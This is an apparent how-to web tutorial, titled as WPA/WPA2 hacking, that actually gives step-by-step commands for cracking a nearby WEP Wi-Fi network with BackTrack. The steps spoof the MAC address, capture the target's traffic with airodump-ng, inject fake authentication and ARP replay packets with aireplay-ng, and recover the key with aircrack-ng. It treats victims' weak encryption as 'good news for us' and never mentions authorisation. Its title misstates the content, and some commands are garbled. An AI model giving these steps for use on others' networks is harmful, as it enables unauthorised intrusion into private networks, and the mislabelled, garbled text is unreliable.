How to hack WiFi password (WPA-WPA2)

How To Hack A wi-fi Network.

WiFi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless

high-speed Internet and network connections. WiFi's today are being used in every home , every office , in every Sphere of

Life.

Before hacking a wireless network you need to understand the working of wi-fi and the encryption used to secure

the connection. so lets start...

How wi-fi Works?

The working of WiFi is pretty simple to understand. The components of wireless network includes a communication device

such as a laptop or a router and internet connection The communication device which has a wireless compatibility

( laptops )converts the data in the form of radio waves and transmits it to the router, through an antenna. The router receives

the signal and decodes it. The router sends the information to the Internet using a physical, wired Ethernet connection. The

reverse communication follows the same the router receiving information from the Internet, translating it into a radio

signals and sending it to the computer's wireless adapter.

How Are Wireless Networks Secured?

In a secured wireless connection, internet data is sent in the form of encrypted packets. These packets are encrypted with network security keys. If you somehow manage to get hold of the key for a particular wireless network you virtually have

access to the wireless internet connection.

Broadly speaking there are two main types of encryption used.

WEP (Wired Equivalent Privacy)

WEP was the First type of encryption used to secure WiFi's long ago. This is the most basic form of encryption. This has

become an unsafe option as it is vulnerable and can be cracked with relative ease. Although many people still use this

encryption and that's a good news for us.

WPA/WPA2 (Wi-Fi Protected Access)

WPA ( Wi-Fi Protected Access ) and WPA2 ( Wi-Fi Protected Access II ) are two security protocols for wireless

networks from the Wi-Fi Alliance that was developed to provide a migration from WEP.This is the more secure alternative.

WPA-2 which is the most secure encryption alternative till date. Although this can also be cracked using a wordlist if

the password is common, this is virtually uncrackable with a strong password. But these encryption can also be broken.

Hacking WEP passwords is relatively fast, so we'll focus on how to crack them by using Backtrack in this tutorial.

What Will You Need?

1.A compatible wireless adapter : This is the biggest requirement that You'll have a PC with a compatible wireless adapter

that's capable of packet injection.Check Before you Hack.

2. BackTrack 5 : live CD or installed on your PC.

3. A nearby WEP-enabledWi-Fi HotSpot : you need a nearby WEP-enabled Wi-Fi with at-least 20% signal(minimal

requirement for launching WiFi hacking apps). The better the single, More chances to get the password relatively fast.

4. Command line : you need command to crack the password.

Hacking WiFi with WEP Passwords Using Backtrack

There are several easy steps down there. Follow the steps one by one and get the password of the WEP encrypted wi-fi.

Step 1 : Install backtrack or a boot from a live CD.

step 2 : Launch Konsole,The backtrack terminal. Type the following command.

ifconfig ( your interface ) up

mine is wlan0 so my command is : ifconfig wlan0 up

To see all wireless cards connected to your system simply type iwconfig.

Step 3 : first run the following commands to change your mac address.

macchanger --mac 00:11:22:33:44:55 (your interface)

Step 4 : Then you need to put your wireless adapter into monitor mode so that it can listen to every packet in the air. Put

your WiFi Adapter on Monitor Mode by this command.

airmon-ng start (your interface)

mine is : airmon-ng start wlan0

Now a new interface mon0 will be created , You can see the new interface is in monitor mode by entering iwconfig mon0.

it is shown in the below image.

Step 5 : Run the following commands to get a list of your network interfaces.

airodump-ng mon0

Bssid shows the MAC address. CH is the channel & Cipher shows the encryption type. Now choose wep protected

network as your target.

Step 6 : Now capture what is transmitting on that network and save it in a file. file name could be anything you like. Use

the following command for this.

airodump-ng -c (channel) -w (file name to save) —bssid

(bssid) (interface)

Enter anything descriptive for (file name).

As my target is broadcasted in channel 6 and has a bssid "98:fc:11:c9:14:22" ,I give in the following commands and save

the captured data as "RHAWEP"

airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP

Step 7:- Now you’ll have to capture at least 20,000 data packets to crack WEP but this method is very slow, it can take

days or even weeks to capture that many data packets. Don't worry! the next command is the solution for this.

aireplay-ng - 1 3 -a (bssid of the target ) (interface)

By this commands it will take only few minuts to captute that much data to crack the password as it make a fake

authentication with the AP.

Step 8 : Now let the technology do its work,minimize the konsole,then open a new console window. Its time to inject Arp

packets for this issue these commands in new console.

aireplay-ng -3 -b (bssid of target) -h ( Mac address of

mon0) (interface)

As we have made a fake mac address for us so use aireplay-ng -3 -b (bssid of target) -h 00:11:22:33:44:55 (interface)

Step 9 : Now we will use the patience part, Basically we want to wait until enough data has been collected to run your

crack. Watch the number in the #Data column we want it to go above 10,000, best would be to wait till it reaches around

80,000 to 90,000 packets. More the packet, less the time to crack the password.

Step 10 : Once you've collected enough data. Launch a third Konsole window and run the following to crack that data

you've collected:

aircrack-ng( name of the file you saved )

If it succeeds, The WEP key appears : "KEY FOUND". Remove the colons from the output and you’ll have your WEP

Key.

If you didn't get enough data, aircrack will fail and tell you to try again with more and you will have to start from the Step

1.